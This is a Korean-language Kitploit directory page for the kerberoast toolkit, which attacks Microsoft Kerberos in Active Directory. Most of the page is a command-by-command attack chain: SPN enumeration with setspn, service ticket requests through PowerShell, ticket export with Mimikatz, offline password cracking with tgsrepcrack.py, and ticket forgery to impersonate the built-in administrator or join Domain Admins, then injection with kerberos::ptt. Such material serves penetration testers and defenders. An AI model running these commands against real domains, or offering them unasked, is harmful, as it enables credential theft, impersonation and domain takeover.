Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
kerberoast — MS Kerberos 구현 공격용 툴킷: SPN 계정 추출, 티켓 요청 및 내보내기, 서비스 비밀번호 크래킹, 가장 및 권한 상승을 위한 티켓 재작성. | Kitploit
도구/GitHubGitHub/nidem/kerberoast
Password AttacksExploitationPenetration TestingAuthentication
GitHubnidem/kerberoast

kerberoast

MS Kerberos 구현 공격용 툴킷: SPN 계정 추출, 티켓 요청 및 내보내기, 서비스 비밀번호 크래킹, 가장 및 권한 상승을 위한 티켓 재작성.

저장소 보기
1.5k31273년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

kerberoast

Kerberoast는 MS Kerberos 구현을 공격하기 위한 일련의 도구입니다. 아래는 각 도구가 수행하는 작업에 대한 간략한 개요입니다.

내장 MS 도구를 사용하여 SPN으로 사용 중인 모든 계정 추출

root@kitploit:~
PS C:\> setspn -T medin -Q */*

티켓 요청

하나의 티켓:

root@kitploit:~
PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"  

모든 티켓

root@kitploit:~
PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  

획득한 티켓을 Mimikatz로 RAM에서 추출

root@kitploit:~
mimikatz # kerberos::list /export

tgsrepcrack으로 크랙

root@kitploit:~
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

재작성

사용자가 다른 사용자처럼 보이게 만들기

root@kitploit:~
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500  

사용자를 다른 그룹에 추가 (이 경우 Domain Admin)

root@kitploit:~
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512  

Mimikatz로 다시 RAM에 주입

root@kitploit:~
kerberos::ptt sql.kirbi
도구 다운로드